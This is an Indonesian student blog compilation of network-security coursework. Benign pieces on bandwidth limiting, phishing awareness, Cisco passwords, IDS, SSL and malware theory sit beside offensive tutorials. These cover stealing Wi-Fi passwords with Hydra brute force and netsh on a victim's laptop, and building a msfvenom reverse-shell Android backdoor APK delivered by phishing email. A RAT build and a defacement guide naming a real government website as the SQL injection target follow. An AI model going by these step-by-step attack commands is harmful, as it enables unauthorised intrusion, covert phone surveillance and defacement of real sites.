Cara mengetahui password WI-FI menggunakan metode social engineering

 Penjelasan Social Engineering

    Social Engineering adalah  salah satu metode yang digunakan oleh peretas untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu[1][2]

Penjelasan Hydra

    Hydra adalah cracker login jaringan paralel yang dibangun di berbagai sistem operasi seperti Kali Linux, Parrot, dan lingkungan pengujian penetrasi utama lainnya.[3]

 

Praktek

    Lalu ada apa dengan wifi? apabila dengan wifi kita bisa melakukan social engineering dengan cara menebak atau menanyakan kepada teman yang sudah terhubung ke jaringan yang bersangkutan / (WIFI).

untuk tahapan yang pertama mengapa menebak? harus ada persiapan seperti informasi yang dimiliki dari ssid wifi tersebut, sebagai contoh nama ssid wifinya adalah “Zoss.net” maka mencoba menebak dengan password zoss.net, Zoss123 dsb cara mempercepatnya adalah menggunakan software hydra.

disini saya akan memaparkan caranya yaitu ada 2 cara yang pertama adalah menebak kata sandi lalu menggunakan software brute force atau hydra, dan juga menggunakan cmd apabila anda meminjam laptop korban untuk mengetahui password wifi.

 

– Hydra  

    – Cek ip atau alamat routernya sebagai contoh adalah 192.168.100.1


    Gambar 1. Cek alamat IP

 – Jangan lupa sebelum melakukan crack password kita akan mencari celahnya menggunakan Nmap mencari port yang terbuka namun disini kita hanya membutuhkan port ssh ataupun telnet. scan ip router 192.168.100.1

Ada di link video

     – buat file username.txt dan password.txt

Gambar 2. Username.txt

 

Gambar 3. Password.txt

cukup isikan seperti dibawah ini

    – Jika sudah buat file .txt untuk username dan password note harus beda file antara username dan password

    – Akan terlihat port yang terbuka

ada di video

    – Lalu ketikkan perintah (ssh) hydra -L username.txt -P password.txt 192.168.100.1 ssh

     (telnet) hydra -L username.txt -P password.txt 192.168.100.1 telnet

 Selengkapnya ada di video. 

    Jika sudah masuk ke router target maka selanjutnya adalah masuk ke website dan ketikkan ip 192.168.100.1. jika sudah pilih pengaturan ~ pilih wlan ~ pilih wlan basic nanti ada preshared key atau password

Gambar 4.Interface / Gui Router

– Scan Vulnerability atau scan port

 

– Hydra Video Tutorial


– CMD

 Cara selanjutny adalah menggunakan cmd jadi sebagai wifi hunter jika salah satu ada yang terhubung ke wifi tersebut dengan pc ataupun laptop lalu menyusup atau mencari password wifi dengan cara ini.

    – Ketikkan netsh wlan show profile key=clear

type netsh wlan show profile in CMD

 Lalu jika mengetahui nama wifi atau ssid bisa ketikkan
 

– netsh wlan show profile nama_wifi_target key=clear

 

Note : cara kedua diatas mungkin ada yang ampuh dan juga tidak namun saya sudah mencoba untuk hydra dan juga menggunakan cmd untuk mengetahui password wifi. 


Terima Kasih,


Ilham Idfiana

 

Cara Limitasi Bandwidth Menggunakan p2pover || Tanpa router mikrotik

Penjelasan Bandwidth Manager

    Bandwidth adalah tingkat maksimum transfer data melintasi jalur yang diberikan. Bandwidth dapat ditandai sebagai bandwidth jaringan, bandwidth data, atau bandwidth digital.[1]
 

P2pover

    p2pover adalah software jaringan internet yang berfungsi untuk melakukan limitasi bandwidth berdasarkan satu network atau dalam satu jaringan. contoh : menggunakan hotspot indihome 
 
asumsi kecepatan indihome 10Mbps apabila masih ada fup maka kecepatannya 1.2Mbps, jika usernya hanya ada 5 maka 1200 / 5 = 240Kbps per device, jadi di softwarenya cukup set 240Kbps agar setiap resource atau bandwidth pada jaringan tersebut akan terbagi rata. 
 

Praktek

 
  Maka tahapan implementasinya adalah di praktikan.
 
tools yang digunakan p2pover, untuk p2pover silahkan cari di internet atau di search engine google.
 
keyword = download p2pover
 
1. Buka aplikasi p2pover.
2. Apabila ada system setting atau ketika baru dibuka aplikasi tersebut ada popup select adapter, pilih LAN apabila menggunakan kabel dan Wifi / Wlan tanpa kabel. note : diutamakan yang satu jaringan atau satu hotspot
3. Jika sudah maka tahap pertama scan  dulu
 4. jika sudah di scan la
lu buka schedule setting untuk melakukan penjadwalan pada setiap perangkat
    –  Klik new
 
    – Isikan schedule namenya , contoh = 24 jam
 
    – Jika sudah diisinamanya klik dengan cara drag sampai warna biru seperti di gambar, ketentuan apabila ingin selama 24 jam

Jika sudah  klik ok

5. Jika sudah tahap schedule selanjutnya adalah tahap pembuatan limitasi jaringannya 
    – buka rule setting
    – Klik New, lalu isikan nama yang diinginkan rulesnya, untuk schedule pilih yang tadi sudah diisikan 24jam atau bebas namanya
    – Selanjutnya isikan bandwidth sesuai kebutuhan perlu diingatkan kembali untuk melakukan limitasi bandwidth / management bandwidth ialah ketika suatu kecepatan internet berada di kecepatan sebagai contoh indihome 10Mbps maka realtime speednya adalah 1.2Mbps apabila masih ada fup, 1.2Mbps apabila dikonversi menjadi Kbps adalah 1200, jika user aktifnya ada 5 user maka cukup bagikan aja 1200 / 5 = 240Kbps per device
    – Selanjutnya next aja sampai selesai
6. Jika sudah isi schedule dan rulesnya beserta scannya, tahap selanjutnya inisiasi nya. Pilih user yang akan di limit 
7. Jika sudah dicentang seperti gambar double klik pada user 192.168.100.x itu alamat network saya. jika berbeda maka sama aja.
8. Pilihlah rulesnya yang sudah tadi di buat.
9. ok
10. Lalu pilih start dan gunakan speed tester untuk membuktikan kecepatan inetnya.
 
 Apabila ingoing sama outcoming nya ada angka seperti diatas maka jalan rulesnya
 
 
Nb : Ini berlaku untuk yang suka main game anti lag ya 🙂

Sekian terima kasih.













Keamanan Jaringan Mata Kuliah – Tel U

 

Pengenalan Mata Kuliah

Jaringan komputer memungkinkan pemanfaatan sumber daya secara bersama-sama. Sehingga keberlangsungan hidup suatu organisasi atau instansi yang memanfaatkan sumber daya secara bersama-sama, sangat tergantung pada fungsinya. Gangguan sekecil apa pun akan memberikan dampak negatif (kerugian), sehingga diperlukan suatu perlindungan. Keamanan jaringan komputer merupakan upaya untuk memberikan perlindungan sistem atas gangguan yang mungkin timbul, baik gangguan dari dalam maupun dari luar.

Capaian Pembelajaran

  1. Memahami konsep dasar keamanan jaringan

  2. Memahami kompleksitas keamanan jaringan

  3. Memahami aspek keamanan jaringan

  4. Memperhatikan kenyataan rendahnya kesadaran akan keamanan jaringan

Konsep Dasar Keamanan Informasi

Jaringan komputer merupakan sekumpulan komputer otonom yang saling terhubung melalui media komunikasi dengan memakai protokol tertentu. Manfaat jaringan komputer antara lain adalah memungkinkan pemakaian bersama (sharing) atas sumber daya yang ada. Sumber daya dalam hal ini dapat berupa perangkat keras, perangkat lunak dan data atau informasi. Manfaat lainnya adalah untuk berkomunikasi, meningkatkan kehandalan dan ketersediaan sistem.

Manfaat yang demikian besar tentunya akan berkurang sebanding dengan tingkat gangguan yang muncul terhadap jaringan. Ketika jaringan hanya melibatkan perangkat lokal saja, atau dengan kata lain tidak terhubung ke jaringan lain, munculnya gangguan mungkin menjadi suatu hal yang tidak diperhitungkan. Namun ketika jaringan sudah terhubung dengan jaringan lain, misalnya lewat internet, keamanan menjadi suatu hal yang harus dipertimbangkan. Kita lebih mengenali hitam putihnya jaringan sendiri, namun tidak untuk jaringan lain. Keamanan jaringan merupakan upaya memberikan keterjaminan jaringan atas gangguan-ganguan yang mungkin muncul.

Secara umum, terdapat 3 hal dalam konsep keamanan jaringan, yakni :

1. Resiko atau tingkat bahaya (risk)

menyatakan besarnya kemungkinan gangguan yang muncul terhadap jaringan.

2. Ancaman (threat)

Menyatakan kemungkinan gangguan yang muncul terhadap jaringan

3. Kerapuhan sistem (vulnerability)

Menyatakan kelemahan-kelemahan pada sistem yang memungkinkan terjadinya gangguan

Elemen Dasar Keamanan

Sedangkan keamanan sendiri menyangkut 3 elemen dasar yakni :

1. Keamanan jaringan (network security)

Upaya pengamanan atas jalur / media pengiriman data

2. Keamanan aplikasi (application security)

Upaya pengamanan atas aplikasi-aplikasi dan layanan yang tersedia. Contohnya DBMS

3. Keamanan komputer (computer security)

Upaya pengamanan atas komputer yang digunakan untuk memakai aplikasi, termasuk di dalamnya adalah sistem operasi. Keamanan bukanlah suatu produk jadi yang tinggal pakai dan dapat mengatasi segala gangguan. Keamanan merupakan suatu proses, terus menerus berkembang sesuai dengan perkembangan imu dan teknologi maupun gangguannya.

Aspek Keamanan Jaringan

Terdapat 3 aspek utama keamanan jaringan meliputi :

  1. Confidentiality / Privacy
  2. Integrity
  3. Availability

Confidentiality

Adalah kerahasiaan atas data pribadi. Data hanya boleh diakses oleh orang yang bersangkutan atau berwenang. Data tersebut antara lain :

  1. data pribadi : nomor ktp, nomor hp, alamat, penyakit dll
  2. data bisnis : daftar gaji, data nasabah / pelanggan

Data-data tersebut sangat sensitif (dilindungi) dalam aplikasi e-commerce maupun healthcare.

Serangan yang dapat terjadi berupa penyadapan atas data, dengan cara teknis : sniffing / logger, man in the middle attack; maupun non teknis dengan social engineering.

Perlindungan yang dapat dilakukan adalah dengan cara enkripsi yakni mengubah suatu format data menjadi format lain yang tersandikan.

Integrity

Bahwa data tidak boleh diubah (tampered, altered, modified) oleh pihak yang tidak berhak.

Serangan muncul berupa pengubahan data oleh pihak yang tidak berhak, spoofing

Perlindungan yang dapat dilakukan adalah : message authentication code (MAC), digital signature / certificate, hash function, logging.

Authenticity

Bahwa data harus tersedia atau dapat diakses saat diperlukan. Serangan yang dapat terjadi berupa peniadaan layanan (denial on service Dos, distributed denial on service Ddos), atau menghambat layanan (respon server menjadi lambat), malware, worm dll

Perlindungan berupa : backup, redundancy, IDS, DRC, BCP, firewall

Rendahnya Kesadaran Keamanan Jaringan

Meskipun keamanan merupakan faktor yang sangat penting bagi fungsionalitas jaringan, ternyata kesadaran untuk masih sangat rendah. Sebagai contoh berdasarkan survei Information Week(USA) : dari 1271 manajer sistem / jaringan, hanya 22% yang menganggap keamanan jaringan sebagai komponen penting. Diperlukan upaya untuk meyakinkan pihak manajemen bahwa investasi di bidang keamanan jaringan memang sangat diperlukan. Di samping itu juga perlu pemahaman pemakai sistem terkait keamanan.

Meskipun teknologi keamanan berkembang pesat, tidak berarti gangguan keamanan dapat dihentikan. Bahkan gangguan keamanan juga mengikuti perkembangan tersebut, memanfaatkan kekurangan dan kelebihan teknologi untuk mlakukan gangguan. Berikut ini adalah beberapa catatan gangguan keamanan yang terjadi, baik di luar maupun dalam negeri.

Manajemen :

Yang penting nyambung dulu (online), keamanan belakangan”

“Sekarang belum ada masalah!”

“Balik modal
nya (ROI) kapan ?”

Praktisi:

“Pinjam password root / admin, dong”

Musuh Dalam Selimut

Computer Security Institute (CSI) / FBI Computer Crime Survey menunjukkan statistik potensi gangguan dari “disgruntled worker” (orang dalam)

  1. Disgruntled workers 86%
  2. Independent hackers 74%
  3. US Competitors 53%
  4. Foreign corp 30%
  5. Foreign gov. 21%

http://www.gocsi.com

“Tujuh-puluh sembilan persen eksekutif senior terjebak dalam kesalahan berfikir bahwa ancaman terbesar terhadap keamanan sistem berasal dari luar (eksternal)”

Hati-Hati Website Phising

                                                                        Figure 1. Phising.

 Phishing adalah salah satu teknik penipuan yang masih sering terjadi di internet. Umumnya phishing ini dilakukan dengan mengirimkan email atau sebuah link website yang seolah-olah penting dan resmi, terus meminta kita menginput data-data pribadi kita. Terus nanti data pribadi tersebut dicuri, yang akibatnya bisa merugikan kita secara finansial.

Contohnya misalnya saya dapat email yang bilang bahwa saya baru saja memenangkan undian Iphone. Nah untuk mengirimkan iphone tersebut saya diminta menginput data-data pribadi saya. Kalo dapat email atau pesan seperti ini, please jangan di klik. Teknik ini sering memberikan tawaran atau iming-iming hadiah yang menggiurkan

Contoh lainnya misalnya saya mendapat email super penting dari bank X, bahwa rekening saya ada masalah, dan akan diblok, supaya akun saya tidak diblokir, saya harus menginput data-data pribadi saya segera. Teknik ini biasanya bersifat super penting, dan harus segera direspon

Ciri lainnya kita mendapat link sebuah website yang sudah dimodifikasi, sangat mirip dengan link aslinya, padahal palsu. Contohnya dulu pernah ada kasus web klikbca.com; ada orang yang mendaftarkan alamat palsu clickbca.com, klickbca.com dst

Selain itu bisa juga dalam bentuk attachment email yang mencurigakan, atau email dari pengirim yang mencurigakan.

Ada banyak lagi teknik phishing. Info lebih lengkapnya bisa dilihat pada link berikut ini:

https://www.phishing.org/

https://blog.google/topics/safety-security/protect-your-google-account-with/

Cara agar aman dari phising adalah.

1. Kenali linknya biasanya linknya apabila acak-acakan berarti palsu atau istilahnya tidak ada tingkat keamanannya

2. Jangan asal klik link, jika kita klik link itu akan terindeks atau terekspos datanya ke server yang sudah di klik biasanya bagi orang pihak ketiga biasanya akan membuat tampilan semirip mungkin sehingga korban akan mengisi data tersebut tanpa berhati-hati

3. Pastikan juga website tersebut sudah memiliki sertifikat ssl atau website tersebut sudah bisa menggunakan protocol https

4. Selalu update web browser pada android, ios dan juga windows 

5. Dan hati-hati jika dimintai data pribadi seperti email, nama, nomor kependudukan dsb

Terima kasih.

Ilham

AUTENTIKASI PADA MODE AKSES CISCO ROUTER

 Pada artikel ini akan membahas tentang cara untuk membuat authentikasi pada mode akses di router Cisco. Untuk penjelasan mode-mode akses pada router Cisco dapat dilihat pada artikel sebelumnya MODE AKSES PADA CISCO ROUTER

A. User Exec Mode

1. Menggunakan password berupa plain text:

Router(config)#line console 0

Router(config-line)#password rahasia

Router(config-line)#login


Output:






2. Menggunakan user dan password

2.1. Pembuatan user dan password dengan Cisco encryption 5

Router(config)#username admin privilege 15 secret rahasia

2.2. Pembuatan user dan password dengan Plain Text:

Router(config)#username admin privilege 15 password rahasia


Aktivasi user dan password pada user exec mode

Router(config)#line console 0

Router(config-line)#login local


Output: 





B. Priveleged Exec Mode

1. Menggunakan password Plain text

Router(config)#enable password rahasia


2. Menggunakan password dengan Cisco encryption 7

Router(config)#enable secret rahasia

Router(config)#service password-encryption

Kelemahan: Cisco encryption 7 dapat di decrypt


3. Menggunakan password dengan Cisco encryption 5

Router(config)#enable secret rahasia

Cisco encryption 5 menggunakan algoritma MD5 hash, sehingga susah untuk di decrypt


Output:










Membuat Aplikasi Backdoor Android Untuk Memonitoring Target

    Ringkasan

    Pada hari ini dalam senggang, kita akan mempelajari cara meretas perangkat seluler Android menggunakan MSFvenom dan kerangka Metasploit. Kami akan menggunakan MSFvenom untuk menghasilkan payload, menyimpannya sebagai file .apk dan menyiapkan listener untuk kerangka Metasploit. Setelah pengguna / korban mengunduh dan menginstal .apk berbahaya, penyerang dapat dengan mudah mendapatkan kembali sesi di Metasploit. Untuk melakukannya, penyerang perlu melakukan manipulasi psikologis untuk memasang .apk di perangkat seluler korban.

Kami akan mendemonstrasikan ini dengan menggunakan alat-alat berikut

– Kali Linux bisa di vmware / virtualbox

– Perangkat / emulator Android

– Zipalign

– VMware atau VirtualBox (lingkungan virtual)

Setelah penyiapan berikut dikonfirmasi tanpa kesalahan, maka kami siap.

Step 1: Menjalankan Kali Linux
Sebelum kita mulai, mari kita bahas tentang MSFvenom. Ini adalah kombinasi dari MSFpayload dan MSFencode. Alat-alat ini sangat berguna untuk menghasilkan payload dalam berbagai format dan mengenkode payload ini menggunakan berbagai modul encoder.
Menggabungkan kedua alat ini menjadi satu alat sangatlah masuk akal. Ini menstandarkan opsi baris perintah, mempercepat sedikit dengan menggunakan satu contoh kerangka kerja dan menangani semua format keluaran yang mungkin. MSFvenom digunakan untuk membuat payload menembus emulator Android.
Dengan menggunakan MSFvenom, kami membuat file .apk muatan. Untuk ini, kami menggunakan perintah berikut:
Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort R > android_shell.apk

Figure 1: MSFvenom payload 

  • -p — Payload to be used
  • LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)
  • LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)
  • R — Raw format (we select .apk)
  • Location — To save the file

Note: Dalam perintah ini, kami telah menggunakan alamat lokal karena kami mendemonstrasikan di lingkungan lokal. Untuk tampil di jaringan publik, Anda harus memasukkan alamat publik Anda di LHOST dan mengaktifkan penerusan port di router.
Setelah perintah ini, sekarang Anda dapat mencari file Anda di desktop dengan nama android_shell.apk.

Figure 2: APK file sudah dibuat

Setelah kami berhasil membuat file .apk, kami perlu menandatangani sertifikat karena perangkat seluler Android tidak diizinkan untuk memasang aplikasi tanpa sertifikat yang ditandatangani dengan benar. Perangkat Android hanya memasang file .apk bertanda tangan / sign certificate.
Dibutuhkan sign certificate .apk file secara manual di kali linux :

  • Keytool (preinstalled)
  • jar signer (preinstalled)
  • zipalign (need to install)

Untuk install sign certificate pada .apk kita maka gunakan perintah sebagai berikut
Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Figure 3: Keytool

Lalu gunakan perintah dibawah sebagai berikut
Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Figure 4: Install jarsigner .apk 

Selanjutnya adalah gunakan terminal dibawah
Terminal : jarsigner -verify -verbose -certs android_shell.apk

Figure 5: Verifikasi.apk menggunakan JARsigner

Apabila belum install zipalign maka harus diinstall dulu dengan perintah seperti gambar dibawha

Figure 6: Instalasi Zipalign

Lalu gunakan perintah zipalign terhadap .apk yang sudah di buat tadi 
Terminal: zipalign -v 4 android_shell.apk singed_jar.apk

Figure 7: Verifikasi the .apk menggunakan Zipalign

Sekarang kami telah berhasil menandatangani file android_shell.apk kami dan dapat dijalankan di lingkungan Android apa pun. Nama file baru kami adalah singed_jar.apk setelah verifikasi dengan Zipalign.

Figure 8: .apk target sudah terinstall

Tahap selanjutnya adalah menggunakan aplikasi metasploit untuk generate payload nya
Terminal: msfconsole

Figure 9: Starting Metasploit

Metasploit begins with the console.

Figure 10: Tampilan Metasploit

Sekarang luncurkan atau jalankan exploit multi/handler dan gunakan android payload untuk bisa mendapatkan isi dari targetnya atau bisa dikontrol menggunakan metasploit.
Terminal: use exploit/multi/handler

Figure 11: Setup exploit

Selanjutnya, setel opsi untuk payload, IP listener (LHOST) dan listener PORT (LPORT). Kami telah menggunakan IP localhost, nomor port 4444 dan payload android / meterpreter / reverse_tcp saat membuat file .apk dengan MSFvenom.
Note : Untuk alamat ip disesuaikan alamat ip dari hp target atau harus dalam satu jaringan sebagai contoh menggunakan Wifi untuk mengetahui alamat ip dari target silahkan gunakan aplikasi Ip-checker dsb

Figure 12: Setup the exploit

Kemudian kita berhasil menjalankan exploit untuk reverse connection.
Terminal: run

Figure 13: Eksekusi exploit

Selanjutnya, kita perlu menginstal file .apk Android yang berbahaya ke perangkat seluler korban. Di lingkungan kami, kami menggunakan perangkat Android versi 8.1 (Oreo). Penyerang dapat membagikan APK Android berbahaya kepada korban dengan bantuan rekayasa sosial / phishing email.
Sekarang saatnya menyiapkan emulator Android dengan cepat (jika Anda tidak memiliki perangkat Android). Langkah-langkah untuk mengonfigurasi emulator Android:
Unduh file gambar untuk proyek kode Android x86 dari situs proyek Google Code (https://code.google.com/archive/p/android-x86/downloads)
Buat mesin virtual menggunakan kernel versi 2.6x lain di workstation VMware
Pasang file ISO ke opsi VMware
Selesaikan proses dan jalankan mesin dalam mode LIVE
Siapkan perangkat Android
Siapkan akun Google
Catatan: Proyek Android x86 dapat menghubungkannya ke jaringan lokal dengan adaptor Ethernet (VMnet8). Jika Anda menggunakan emulator lain untuk menembus perangkat Android, Anda juga dapat menggunakan emulator Android CLI.
Setelah mengatur emulator Android di VM, kami akan mengunduh file dari tautan cloud yang telah kami buat di Kali Linux dan dikirim melalui email ke akun korban.

Figure 14: Spam email

Download file yang tadi .apk yang sudah kita buat lalu install kan pada Android tapi disarankan jangan hp langsung, gunakan emulator untuk pengujian.

Figure 15: Download file .apk

Jalankan .apk tersebut

Figure 16: Install aplikasi .apk

Jika sudah di install pada target maka kita kembali lagi ke kali linux
Kita bisa lihat target sudah bisa masuk pada gambar dibawah

Figure 17: Target

Untuk mengetahui target gunakan perintah ? atau help command, kamu akan melihat banyak perintah yang bisa digunakan untuk target
Note : Gunakan Aplikasi ini pada emulator seperti nox, bluestack dsb. dikarenakan akan terdampak bahaya apabila digunakan langsung pada hp android.
terima kasih 
sekian

Tugas Keamanan Jaringan ~ IDS

 

Nama    : Ilham Idfiana

Kls          : D3TK-42-02

NIM       : 6702184010

  1. Jelaskan apa fungsi Intrusion Detection System (IDS) pada sebuah sistem keamanan jaringan!
  2. Jelaskan apa perbedaan IDS dan IPS!
  3. Pada proses deteksi serangan dikenal istilah False Positif dan False Negatif. Jelaskan apa yang dimaksud dengan False Positif dan False Negatif!
  4. Jelaskan apa yang dimaksud dengan metode deteksi Signature Based!
  5. Jelaskan apa yang dimaksud dengan metode deteksi Anomaly Based!
  6. Sebutkan 3 contoh tools IDS!

Jawaban

1.       Intrusion Detection System (disingkat IDS) adalah sebuah metode yang dapat digunakan untuk mendeteksi aktivitas yang mencurigakan dalam sebuah sistem atau jaringan. IDS dapat melakukan inspeksi terhadap lalu lintas inbound dan outbound dalam sebuah sistem atau jaringan, melakukan analisis dan mencari bukti dari percobaan intrusi (penyusupan).

2.       IDS (intrution detection system) adalah sebuah sistem yang melakukan pengawasan terhadap lalu lintas (traffic) jaringan dan pengawasan terhadap kegiatan kegiatan yang mencurigakan didalam sebuah sistem jaringan. intrusion prefention system

(IPS), adalah pendekatan yang sering digunakan untuk membangun sistem keamanan komputer,IPS mengkombinasikan teknik firewall dan metode IDS dengan baik

3.       False positif – adalah peringatan yang dihasilkan oleh IDS karena telah mendeteksi adanya serangan yang valid terhadap sistem yang kita monitor, tetapi serangan itu sendiri tidak valid. Atau dengan kata lain, kita mendapat laporan serangan, padahal itu bukan serangan. Ini adalah masalah bagi kita karena banyaknya peringatan yang dibuat oleh IDS padahal serangan yang sebenarnya tidak terjadi. False positif bisa saja terjadi karena adanya serangan pada sistem yang tidak di monitor.

 

 False negatif – adalah serangan yang benar-benar terjadi tetapi tidak terdeteksi oleh IDS. IDS bisa melewatkan serangan karena menganggap serangan yang dilakukan tidak sesuai dengan aturan yang ada (rule), atau karena terlalu banyak serangan, atau bisa juga karena penyerang berhasil melumpuhkan IDS. Dampak dari false negatif ini artinya penyerang berhasil melewati IDS, sama artinya dengan ada yang menyerang kita, tapi kita tidak menyadarinya!

4.       Signature detection – IDS yang bekerja menggunakan signature (rule/peraturan) akan mendeteksi serangan jika ada traffic network yang masuk ke dalam daftar serangan. Signature – lah yang menentukan paket yang masuk ke network tersebut merupakan serangan atau biasa disebut “bad traffic”. Kekurangan dari metode ini adalah bahwa IDS hanya bisa mendeteksi suatu serangan yang telah terdaftar sebelumnya di dalam signature. Oleh karena itu, metode ini akan kesulitan menghadapi daftar serangan jenis baru. Bila kita menggunakan signature detection mungkin akan berdampak sedikitnya peringatan false positif tetapi banyak false negatif.

5.       Anomaly detection – IDS yang menggunakan anomaly detection bekerja menggunakan cara yang berbeda. IDS akan mengenal traffic “normal” jaringan kita dan akan mulai mengingatkan kita bila ternyata ada traffic yang “abnormal”. Masalahnya adalah, sesuatu yang baru atau berbed
a juga bisa dianggap abnormal. Jadi jika kita menggunakan metode ini IDS akan memberikan sedikit false negatif tetapi banyak false positif.

6.       Zeek, Snort, Kismet

Praktikum

Install Snort Aplikasi

Lalu Jalankan Snorting

Gambar diatas adalah prses dari snort dari pc

Cara Membuat SSL Sendiri Mikrotik

A. Pengertian SSL
Sertifikat SSL atau yang lebih dikenal dengan SSL adalah singkatan dari Secure Socket Layer. Apabila sistem keamanan ini ditambahkan pada website Anda, maka URL website akan berubah menjadi HTTPS. Tujuan utama pemasangan SSL adalah sebagai pengaman pertukaran data yang terjadi melalui jaringan internet.

Di awal tadi kami sempat menyinggung, apa beda SSL dengan TLS? Sebenarnya, kini SSL sudah tidak digunakan sama sekali dan sudah digantikan oleh TLS.

Walaupun begitu, karena kebanyakan orang sudah terlalu familiar dengan istilah SSL, perusahaan tetap menggunakan istilah tersebut. Padahal pada dasarnya kini fitur enkripsi yang disediakan adalah TLS.

Keduanya sama-sama mengamankan transfer data di dalam website. Namun, teknologi TLS lebih baik karena lebih baru dan merupakan upgrade dari SSL. Jadi Anda tidak perlu khawatir dengan perbedaan istilah tersebut.

Langsung aja caranya

1.       Membuat SSL

a.       Sebelum membuat ssl bikin server untuk menampung ssl dan tampilan hotspot disini saya menggunakan mikrotik untuk membuat tampilan login hotspot dan ssl

b.      Pertama buka mikrotik “Winbox”


c.       Lalu buka menu terminal dan ketikkan
/certificate

add name=ca-template common-name=myCa key-usage=key-cert-sign,c

rl-sign

sign ca-template name=myCa                                    
 add name=Hotspot-template common-name=Hotspot
sign Hotspot-template ca=myCa name=Hotspot
set [find name=Hotspot] trusted=yes

d.      Lalu jika ingin melihat hasil dari certificatenya buka menu system > certificate

 

2.       Pengujian Ke Web browser & setting hotspot

a.       Disini saya menggunakan ip 192.168.1.1 untuk server mikrotiknya sedangkan ke internet menggunakan NAT.

Untuk server konfigurasi hotspotnya

 



Pada gambar diatas buka Ip > Hotspot > Pilih server Profile > lalu pilih hsprof1 dan buka tab bagian login pilih https dan isi ssl certificatenya dngan hotspot, apabila belum ada hsprof1nya bisa buka menu Ip > Hotspot > Servers > Hotspot Setup.

b.      Pengujian Di Web Browser


Pada gambar diatas adalah ketika mengunjungi website atau ip 192.16
8.1.1 maka akan ada tampilan connection not secure karena ssl tersebut tidak terdaftar untuk public hanya untuk local saja dan tingkat keamanannya juga sangat rentan.

Referensi : 
– https://www.niagahoster.co.id/blog/apa-itu-ssl/
– https://www.youtube.com/watch?v=0PS5YRHekGM&feature=youtu.be

Tugas Keamanan Jaringan ~ Malware

 Malware RAT

Nama    : Ilham Idfiana

KLS         : D3TK-42-02

NIM       : 6702184010

Teori

  1. Jelaskan apa yang dimaksud dengan analisa malware dengan metoda statik!
  2. Jelaskan apa yang dimaksud dengan analisa malware dengan metoda dinamis!
  3. Jelaskan apa yang dimaksud dengan reverse engineering!
  4. Sebutkan 5 tools yang dapat digunakan untuk melakukan analisa malware!
  5. Jelaskan apa saja tahapan yang harus dilakukan dalam melakukan analisa malware!
  6. Jelaskan bagaimana cara membuat “safe environment” untuk melakukan analisa malware!
  7. Jelaskan apa kegunaan dari Sandbox!
  8. Jelaskan bagaimana cara antivirus mendeteksi malware!

Jawaban

1.       Static Analysis : Merupakan metode yang digunakan untuk melakukan analisa malware dengan cara mengamati secara langsung kode sumber (source code) malware tersebut. Dalam mengamati kode sumber malware, terdapat teknik yang umumnya digunakan, yaitu Reverse Engineering.

2.       Dynamic Analysis : Merupakan metode yang digunakan untuk melakukan analisa terhadap malware dengan mengamati kinerja sistem yang dapat terlihat dari perilaku sistem sebelum malware dijalankan dengan perilaku sistem setelah malware tersebut dijalankan pada sistem tersebut. Metode dynamic analysis umumnya menggunakan software virtual seperti VirtualBox, VMWare dan lain-lain, sehingga apabila malware yang dijalankan tersebut ternyata merusak sistem, maka sistem utama tidak mengalami kerusakan akibat malware tersebut.

3.       reverse engineering adalah proses penemuan prinsip-prinsip teknologi dari suatu perangkat, objek, a
tau sistem melalui analisis strukturnya, fungsinya, dan cara kerjanya. Proses ini biasanya melibatkan pemisahan (perangkat mesin, komponen elektronik, program komputer, atau zat biologi, kimia, atau organik) dan analisis terhadap cara kerjanya secara terperinci, atau penciptaan perangkat atau program baru yang memiliki cara kerja yang sama tanpa memakai atau membuat duplikat (tanpa memahami) benda aslinya. Pada dasarnya, prinsip rekayasa balik sama dengan penelitian ilmiah, namun objek yang ditelaah berbeda. Objek yang ditelaah pada riset ilmiah biasanya adalah fenomena alami, sedangkan pada rekayasa balik, objek yang ditelaah adalah benda buatan manusia.

4.       Autopsy, Binhash, Chaos Reader, antiword, sigtool

5.       Untuk melakukan analisa malware pertama kita download aplikasi untuk membuat malware ataupun download malwarenya, untuk pengujian malware disarankan harus menggunakan virtualisasi agar aman untuk digunakan, lalu capture hasil dari virus tersebut atau analisis di website online untuk aplikasinya

6.       Untuk safe environment atau pun pengujian langsung malwarenya adalah menggunakan virtualisasi agar meminimalisir terjadinya terkena malware secara langsung

7.       Sandbox adalah mekanisme keamanan untuk memisahkan program yang sedang berjalan. Istilah ini acap digunakan untuk mengeksekusi kode yang belum diuji, atau program tidak tepercaya yang berasal dari pihak ketiga dan pemasok yang tidak terverifikasi, serta pengguna dan situs web yang tidak tepercaya.

Teknologi sandbox sering kali digunakan untuk menguji program tidak terverifikasi yang mungkin mengandung virus atau kode jahat lainnya, tanpa harus membiarkan perangkat lunak tamu membahayakan perangkat penyedia.

8.       Cara antivirus bekerja adalah ketika melakukan scanning file maka aakan mendeteksi apakah file tersebut terinfeksi sebuah virus atau tidak biasanya yang sering ampuh untuk mendeteksi file virus adalah windows defender dikarenakan ada informasi jelas yang sudah menginfeksi file tersebut dan bisa menghilangkannya.

 

Praktek

Buatlah Sebuah Malware dengan tools 888 RAT, pada gambar dibawah ini adalah proses pembuatan RAT dengan hasil akhirnya adalah apk atau format aplikasi pada android

Dan ketika sudah di scan di website hybrid analysis ditemukan bahwa apk tersebut memiliki malware Trojan pada scan melalui ikarus

Cara deface web menggunakan Havij pro

Apa itu deface?

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di

dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja

server lambat dan lama-kelamaan server akan crash dan down.

Itulah deface.

ok langsung saja

peralatan perang yang dibutuhkan

1.acunetix –> download

2.havij pro –> download

3.admin login finder –> download

4.shell backdoor –> download

1.scanning web korban dengan acunetix disini korban saya http://www.vsi.esdm.go.id maaf ya adamin cuman buat pembelajaran

scanning sampai selesai setelah itu muncul hole atau kerentanan web tersebut


hmmm sepertinya disisni saya akan mengeksekusi web tersebut dengan teknik sql injection

